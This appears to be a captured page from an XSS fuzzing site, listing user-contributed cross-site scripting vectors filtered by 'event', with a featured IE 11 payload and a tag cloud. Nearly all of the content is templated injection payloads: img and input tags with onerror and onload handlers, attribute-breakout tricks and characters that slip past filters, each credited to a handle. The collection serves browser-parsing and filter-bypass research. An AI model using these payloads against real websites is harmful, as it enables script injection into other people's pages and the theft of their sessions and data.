Featured vector

IE 11.0
<!-- sample vector --> <img src="xx:xx0x22onerror=alert(1)>

Fuzz vector cloud

Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml

3,344,426 Successful fuzzes

Fuzz Vectors

Searching for "event"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
char after event <!-- sample vector --> <img src=xx:xx onerror*chr*=logChr(*num*)> @chmodxxx
On Event Header Based Testing <img src=x *chr*onError="javascript:log(*num*)"/> @1baicai1
Valid characters in on____ event handler attributes <img src on*chr*error=logChr(*num*)> @Lamp_Sec
Characters used for event handlers instead of equal sign <img src*chr*"about:blank"> @synackozgur
Crazy MSIE v3 <input value=""*dataevents* =customLog('*dataevents*') " type="text"> @Giutro
o replacement in event handlers <img src=xx:xx *chr*nerror=logChr(*num*)> @blubbfiction
Characters allowed between event handlers and equal sign <img src="about:blank" onerror*chr*=logChr(*num*)> @peksa
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters that dont inhibit eventhandlers <img src=xx:xx o*chr*nerror=logChr(*num*)> @tifkin_
Characters that break out of quoted attributes2 <img src="1*chr* onerror="logChr(*num*)"> @tifkin_
Characters allowed between 2 consecutive functions <script> function a() {} </script> <img src=1 onerror="a()*chr*logChr(*num*)"> @tifkin_
Characters allowed before single functions in event handlers <img src=1 onerror="*chr*logChr(*num*)"> @tifkin_
Characters that can set event handlers3 <img src=1 onerror*chr*"logChr(*num*)"> @tifkin_
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
char for fireing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Tags that execute onerror <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> @garethheyes